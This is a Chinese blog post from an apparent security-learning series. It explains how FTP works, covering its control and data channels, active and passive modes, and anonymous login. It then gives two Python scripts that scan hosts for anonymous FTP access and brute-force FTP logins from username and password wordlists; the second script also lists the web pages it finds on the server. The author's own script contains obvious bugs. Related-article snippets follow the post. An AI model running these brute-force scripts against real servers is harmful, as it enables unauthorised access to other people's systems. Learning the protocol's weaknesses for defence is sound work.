4.FTP

最新推荐文章于 2021-07-30 14:26:25 发布
最新推荐文章于 2021-07-30 14:26:25 发布
阅读量219 收藏 1
点赞数
分类专栏: 通讯协议学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51353029/article/details/119246450
版权

文章目录

FTP协议原理以及两种工作模式:

什么是FTP呢?

FTP 是 TCP/IP 协议组中的协议之一,是英文File Transfer Protocol的缩写。

简单的说,FTP就是完成两台计算机之间的拷贝,从远程计算机拷贝文件至自己的计算机上,称之为“下载 ”文件。若将文件从自己计算机中拷贝至远程计算机上,则称之为“上传(upload)”文件。在TCP/IP协议中,FTP标准命令TCP端口号为21,Port方式数据端口为20。

这里提到一个点:FTP标准命令TCP端口号为21,Port方式数据端口为20。后面再将工作模式的时候要用到,这里端口需要知道以下。

简单来说就是:客户端与服务器进行文件交互,包括下载和上传采用的一种协议

两种工作模式:

FTP是一种文件传输协议,它支持两种模式,一种方式叫做Standard (也就是 Active,主动方式),一种是 Passive (也就是PASV,被动方式)。 Standard模式 FTP的客户端发送 PORT 命令到FTP server。Passive模式FTP的客户端发送 PASV命令到 FTP Server。

基础知识:

FTP协议通讯有两个通道,分别是控制通道和数据通道

操控通道:操控通道是和FTP服务器进行沟通的通道,衔接FTP,发送FTP指令都是经过操控通道来完成的。

数据通道:数据通道是和FTP服务器进行文件传输或许列表的通道。

Standard工作模式:

我们先通过一张图了解整个过程:
在这里插入图片描述
[图源网络]
说一下连接流程:

  1. 客户端打开一个在本机的随机端口(>1024)X,向已知的FTP服务器的21端口发送连接请求并且在这个通道发送PORT命令;
  2. 告诉服务端自己已经监听在了Y端口等待,等待你的数据传输;
  3. 服务端收到后验证信息的有效性,如基于用户验证后;主动打开数据端口20把数据通过该端口发送给客户端的Y端口,完成数据传输。

这里就提到了21端口和20端口,前面已经提到过了,这里就不做过多解释了

Passive模式:

还是先来看一下Passive模式的工作流程:
在这里插入图片描述
[图源网络]

看一下他的工作流程:
1.在建立控制通道的时候和Standard模式类似,当客户端通过这个通道发送PASV 命令的时候,FTP server打开一个位于1024和5000之间的随机端口并且通知客户端在这个端口上传送数据的请求
2.然后FTP server 将通过这个端口进行数据的传送,这个时候FTP server不再需要建立一个新的和客户端之间的连接。

结合上面的图我们可以很简单的理解清楚这种工作模式

两种工作模式的区别:

相同之处:
1.都是由客户端去主动连接服务端的21端口
不同之处:
1.Standard需要建立两次连接,一次连接是客户端连接服务端的21端口,商量好后由客户端开X号端口接收数据后,再由服务端的20端口与客户端的X号端口建立连接,然后才能传输数据
2.Passive只需要建立一次连接,控制通道即为数据通道,但是这里需要注意的是,客户端连接了服务端21端口号,商量好服务端开Y号端口,客户端需要注意以下,然后由服务端Y号端口与客户端进行传输,这里只建立一次连接。

谈一谈Standard:

我们可以了解到Standard是需要建立两次连接的,一次是客户端主动去连接服务端,一次是服务端主动连接我们客户端,那么这里问题就出现在了第二次上面,一般来说,防火墙一般来说是不允许外界连接本机,那么我们的传输通道就会出问题,具体情况如下:
在这里插入图片描述通道命令可以建立,但是数据通道会被拦截

FTP暴力破解登录:

匿名登陆:

在破解之前,先了解一下匿名登陆:
互连网中有很大一部分 FTP 服务器被称为“匿名”(Anonymous)FTP 服务器。这类服务器的目的是向公众提供文件拷贝服务,不要求用户事先在该服务器进行登记注册,也不用取得FTP服务器的授权。Anonymous(匿名文件传输)能够使用户与远程主机建立连接并以匿名身份从远程主机上拷贝文件,而不必是该远程主机的注册用户。用户使用特殊的用户名“anonymous”登陆FTP服务,就可访问远程主机上公开的文件。许多系统要求用户将Emai1地址作为口令,以便更好地对访问进行跟综。

脚本:

import ftplib
def annologin(hostname):
    try:
        ftp=ftplib.FTP(hostname)
        ftp.login('anonymous','') #匿名登录
        print('\n'+hostname+'login success')
        return True
    except:
        print('\n'+hostname+'login false')
        return False
if __name__=="__main__":
    f=open(url.txt,'r')
    lines=f.readlines()
    for line in lines:
        url=line.replace('\n', '')
        annologin(url)
    f.close
def baoli(hostname):
    fo.open('username.txt')
    usernamelines=fo.readlines()
    for username in usernamelines:
        fox.open('passwd.txt')
        for passwd in fox.readlines():
            try:
                ftp=ftplib.FTP(hostname)          #实例化FTP连接
                ftp.login(username,passwd)
                print('\n'+username+passwd+'is success')
            except:
                pass
            ftp.quit()
if __name__=='__main__':
    annologin(hostname)
    try:
        if annologin(hostname):
            pass
        else:
            baoli(hostname)
    except:
        pass;

这里直接上脚本看就好了,对Ip端口进行一个简单的FTP是否存在匿名访问,如果不存在匿名访问,则暴力破解登录

贴上其他作者的脚本:

# -*- coding: utf-8 -*-
"""
Created on Sun Nov  4 12:12:41 2018
@author: 小谢
"""
import parser
import optparse
import ftplib
def anonLogin(hostname):     #验证是否可匿名登录
    try:
        ftp=ftplib.FTP(hostname)
        ftp.login('','')  #匿名登录
        print '\n[*] '+hostname +' FTP Anonymous Login Succeeded!'
        return (True,ftp)
    except:
        print '\n[-] '+str(hostname)+' FTP Anonymous Login Failed!'
        return (False,ftp)
def bruteLogin(hostname,passwdFile):  #暴力破解
    f=open(passwdFile,'r')
    lines=f.readlines()
    for line in lines:
        user=line.split(":")[0]                #用户名
        passwd=line.split(":")[1].strip("\n")  #密码
        try:
            ftp=ftplib.FTP(hostname)
            ftp.login(user,passwd)
            print '\n[*] '+hostname +' FTP Login Succeeded!'
            print("User:%s Password:%s"%(user,passwd))
            return(True,ftp)
        except Exception,e:
            pass
    print '\n[-] Could not brute force FTP credentials!'
    return(False,ftp)
def returnDefault(ftp):     #列出FTP目录下的网页文件
    try:
        dirList=ftp.nlst()   #列出FTP目录下的文件或目录
    except Exception,e:
        print e
        print '[-] Could not list directory contents!'
        return
    retList=[]
    for filename in dirList:
        fn=filename.lower()        #将目录名转换为小写
        if '.php' in fn or '.html' in fn or '.asp' in fn or '.jsp' in fn or '.htm' in fn:
            print'[+] Found default page:'+filename
            retList.append(filename)
    return retList
def main(): 
    usage="python %prog -H <target host> -F/f <password file>"  #显示文件的用法帮助信息
    parser=optparse.OptionParser(usage)   #实例化一个对象
    parser.add_option('-H',dest='Host',type='string',help='target host')
    parser.add_option('-f','-F',dest='File',type='string',help='target host')
    (options,args)=parser.parse_args()
    Host=options.Host
    File=options.File
    if Host==None:
        print(parser.usage)
        exit(0)
    if File==None:
        a=anonLogin(Host)
        if a[0]:
            returnDefault(a[1])  
    else:
        b=bruteLogin(Host,File)
        if b[0]:
            returnDefault(b[1])
    return 
if __name__=="__main__":
    main()

关于钟馗之眼实战搜索:

自己再钟馗之眼查询了一下FTP服务器,发现现在采用FTP协议的少止又少,大部分是ssh、scp,咨询了一下其他师傅,都说现在FTP已经被计网书删了都,目前让我快速过一遍。于是关于FTP的学习目前就到此为止,进行一个简单的学习了解,写一个探测脚本,如果后面遇到了,会在此基础之上继续学习

https://blog.csdn.net/p4885056000/article/details/79158408/

hahahahaha!
关注
专栏目录
FTP模式及端口(数据端口、命令端口)
u012886185的博客
04-25 3万+
FTP是基于TCP的高级文件协议,在传输的过程中,主要分为建立连接和数据传输两部分,响应的涉及到服务器端的命令端口和数据端口。建立连接是采用tcp的三次握手模型,对于ftp服务器来说,采用固定的21命令端口和客户端进行通信,在数据传输过程中,根据FTP传输的时候的服务端数据通信过程中选择不同数据端口,可以将ftp分为主动模式(Port)和被动模式(Pasv),这两种模式,对于客户端来说,端口没有固定性,只是在创建的时候,可以主动指定本地端口,或者是随机端口,而对于服务器来说,差异性在于采用...
《计算机网络》期末模拟考试练习+答案
热门推荐
li-shaoyu的博客
07-15 3万+
期末考试模拟试题参考 一、单选题(共20题,20分) 1、下列有线传输介质中抗电磁干扰最好的是()。 A、 屏蔽双绞线 B、 同轴电缆 C、 非屏蔽双绞线 D、 光纤 正确答案: D 解析: 2、TELNET通过TCP/IP协议在客户机和远程登录服务器之间建立一个()。 A、 UDP B、 ARP C、 TCP D、 RARP 正确答案: C 解析: 3...
ftp-主动模式(PORT)和被动模式(PASV)
duobaohongtu3的专栏
08-14 1021
简介 FTP协议要用到两个TCP连接, 一个是命令连接,用来在FTP客户端与服务器之间传递命令; 另一个是数据连接,用来上传或下载数据。 无论是主动模式还是被动模式,其要进行文件传输都必须依次建立两个连接,分别为命令连接与数据连接。而主动模式与被动模式的差异主要体现在数据连结通道上 顺便给大家 安利一款安全优秀的iis7服务器管理工具功能强大 超好用的 ~ IIS7服务器管理工具是一款windows全系、Linux系统下链接并操控VPS、VNC、FTP等远程服务器、云服务器。 界面简单明了,操作易上..
FTP协议及工作原理详解
sinat_27674731的博客
02-07 2375
FTP协议及工作原理详解 1. FTP协议 什么是FTP呢?FTP 是 TCP/IP 协议组中的协议之一,是英文File Transfer Protocol的缩写。 该协议是Internet文件传送的基础,它由一系列规格说明文档组成,目标是提高文件的共享性,提供非直接使用远程计算机,使存储介质对用户透明 和可靠高效地传送数据。简单的说,FTP就是完成两台计算机之间的拷贝,从远程计算机拷贝文件至自己的计算机上,称之为“下载 (download)”文件。若将文件从自己计算机中拷贝至远程计算机上,则称之为.
大型Web系统三种主要的数据类别
hyp的专栏
12-24 466
1. Web静态文件服务 主要提供构建WebUI需要的一些静态文件。 特点: a. 每一个Web页面必定会用到一些静态UI文件。 b. 对于一个网站,这种静态文件数量不会非常的多。   2. Web服务需要用到的二进制文件 例如,用户上传的文件,用户的图片等 特点: a. 文件的生存周期,可能和应用的逻辑相关。 b. 文件的权限,可能和应用的逻辑相关。 c. 会涉及到大量的...
it.sauronsoftware.ftp4j.FTPClient
kzhzhang的专栏
07-03 2129
package classTest; import it.sauronsoftware.ftp4j.FTPClient; import java.io.File; public class FtpHandle { private FTPClient client = new FTPClient(); /** * 登录FTP,并返回登录是否成功的Boolea...
FTP异常 -- it.sauronsoftware.ftp4j.FTPException [code=550, message= Directory not found] (System.err)
张国祥的专栏
09-01 7731
【异常信息】 it.sauronsoftware.ftp4j.FTPException [code=550, message= Directory not found]  (System.err)     at it.sauronsoftware.ftp4j.FTPClient.list(FTPClient.java:2164)  (System.err) 【异常说明】 服
java.lang.InstantiationError: sun.net.ftp.FtpClient
w8827130的博客
04-23 3943
今天排查老系统上传文件报错问题时发现线上环境控制台报错java.lang.InstantiationError: sun.net.ftp.FtpClient 随手复制粘贴百度,很容易找到了原因,在jdk1.6中FtpClient是有空的构造函数的,但是到了jdk1.7之后FtpClient的空构造函数就被私有化了 带着这个答案我阅读了项目的代码,发现在报错信息所指代码行处有一个ftpClien...
org.apache.commons.net.ftp.FTPConnectionClosedException异常产生原因
冷月宫主的专栏
06-29 8949
http://bbs.csdn.net/topics/370107153 在一个项目运行过程中出现了org.apache.commons.net.ftp.FTPConnectionClosedException: FTP response 421 received.  Server closed connection.的异常情况。 使用的是apache的开源FTP连接包 在J2S
it.sauronsoftware.ftp4j.FTPException [code=426, message= Failure writing network stream.
x635981012的博客
04-15 3387
在使用ftp4j下载ftp时出现,下载却提示Failure writing network stream.。。很令人费解。 后面发现是在FTPDataTransferListener里面使用了系统的控件,把这些控件用handler.post(new Runnable(){})包起来就行了
使用commons.net FTP 和sun.net.ftp.FtpClient 多种方式上传下载(包括批量)删除功能(一)
08-14
3. **设置工作模式**:根据需求,可以切换到二进制或文本模式,使用`FTPClient.setFileType(FTP.BINARY_FILE_TYPE)`或`FTP.ASCII_FILE_TYPE`。 4. **上传文件**:调用`FTPClient.storeFile(String remote, ...
ftp4j-1.7.2.jar
06-15
client.connect("ftp.example.com"); // 连接FTP服务器 client.login("username", "password"); // 登录 client.setFileType(FTPClient.BINARY_FILE_TYPE); // 设置文件传输类型为二进制 client.upload(new ...
FTP客户端Java类库 ftp4j
06-02
client.connect("ftp.example.com"); client.login("username", "password"); // 切换工作目录 client.changeWorkingDirectory("/public_html"); // 上传文件 client.upload(new File("localfile.txt")); ...
可用的ftp4j-1.7.2jar包.zip
08-29
可用的ftp4j-1.7.2jar包 , 压缩包解压,提取jar包直接使用,
apache-ftpserver-1.1.1.zip
09-29
4. **性能优化**:FTPServer具有良好的性能和可扩展性,能够处理大量的并发连接,适合大型企业或高流量网站使用。 5. **用户管理**:可以创建多个用户账户,为每个账户分配不同的权限,确保只有授权用户才能访问...
1.从零认识 TCP、UDP 协议到完成 DOS脚本攻击
E1even的博客
07-30 1658
声明: 这个系列的文章是很久以前写的了,保存再本地怕丢失了。文章里面有些图片转存失败,我也没有进行更正修改,因为图片实在是太多了。如果有要PDF带图的师傅,可以加我要PDF版本。(Q:1056391561) TCP、UDP协议到完成SYN—flood脚本攻击再到实现简易通讯 前言:看了网络上大部分文章,都不是很好理解,因此自己写下这篇文章,帮助后面的学习者更好理解。这里我将用通俗易懂的话语对TCP、UDP、协议漏洞、SYN攻击、简易攻击脚本五个模块做一个阐述 TCP/IP: 什么是TCP/IP协议 TCP/
3.基于TCP、UDP的扫描探测
E1even的博客
07-30 1346
SYN全端口半扫描: 首先需要知道SYN的原理,之前在提到过syn_flood:消耗服务器资源导致服务器运行缓慢严重至瘫痪的攻击方式。 认识一下SYN半扫描: 在认识之前,我们先知道TCP三次握手: 第一次握手:客户端–>服务端:发送SYN (建立通讯的包) 第二次握手:服务端–>客户端:发送SYN+ACK 第三次握手:客户端–>服务端:发送ACK 这里放上图和名次解释,几天不复习,自己又忘了: TCP数据包 头结构: 名次解释: ●源端口、目的端口:16位长。标识出远端和本地的端口号
8.认识robots.txt到爬取信息
E1even的博客
07-30 1157
1.robots协议: 什么是robots.txt: robots.txt是一个协议,而不是一个命令。robots.txt是搜索引擎中访问网站的时候要查看的第一个文件。robots.txt文件告诉蜘蛛程序在服务器上什么文件是可以被查看的,在一个搜索引擎要访问这个网站之前,会先访问robots.txt,robots.txt会告诉搜索引擎什么目录不可访问或者哪些目录可以访问。 注意:robots协议并不是一个规范,而只是约定俗成的,所以并不能保证网站的隐私。robots.txt协议是任何用户可以查看的,当然,是
7.正则抓取页面内容
E1even的博客
07-30 905
请求方法: 因为自己在这一块是有基础得,所以下面简单讲解一下请求方法: GET请求: GET方法:    用于使用给定的URI从给定服务器中检索信息,即从指定资源中请求数据。使用GET方法的请求应该只是检索数据,并且不应对数据产生其他影响。   单纯跳转页面得请求:xazlsrc.com/index.php xazlsrc.com/login.php,即直接在url后面加上要访问得页面名称即可   传值得请求:例如某登录界面:xazlsrc.com/?username=1&passwd=2   说
sun.net.ftp.ftpclient工具类 上传
最新发布
05-23
使用 sun.net.ftp.ftpclient 工具类进行文件上传需要以下步骤: 1. 建立 FTP 连接:使用 `FtpClient` 类的 `openServer` 方法建立连接,需要传入 FTP 服务器的地址和端口号。 2. 登录 FTP 服务器:使用 `FtpClient` 类的 `login` 方法登录 FTP 服务器,需要传入 FTP 服务器的用户名和密码。 3. 切换到上传目录:使用 `FtpClient` 类的 `cd` 方法切换到上传目录。 4. 设置上传模式:使用 `FtpClient` 类的 `setBinaryMode` 方法设置上传模式为二进制模式。 5. 上传文件:使用 `FtpClient` 类的 `put` 方法上传文件,需要传入本地文件的路径和上传后的文件名。 6. 关闭连接:使用 `FtpClient` 类的 `closeServer` 方法关闭连接。 以下是一个简单的上传文件的示例代码: ```java import sun.net.ftp.FtpClient; import java.io.FileInputStream; public class FtpUploader { public static void main(String[] args) throws Exception { String server = "ftp.example.com"; int port = 21; String username = "username"; String password = "password"; String localFilePath = "/path/to/local/file.txt"; String remoteFileName = "file.txt"; FtpClient ftpClient = new FtpClient(server, port); ftpClient.login(username, password); ftpClient.cd("/upload"); ftpClient.setBinaryMode(); FileInputStream fis = new FileInputStream(localFilePath); ftpClient.put(fis, remoteFileName); fis.close(); ftpClient.closeServer(); } } ``` 注意:`sun.net.ftp.FtpClient` 类是 Sun JDK 内部使用的类,不是公开的 API,因此可能会在不同版本的 JDK 中存在变化。建议使用第三方 FTP 客户端库,如 Apache Commons Net,来进行 FTP 操作。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值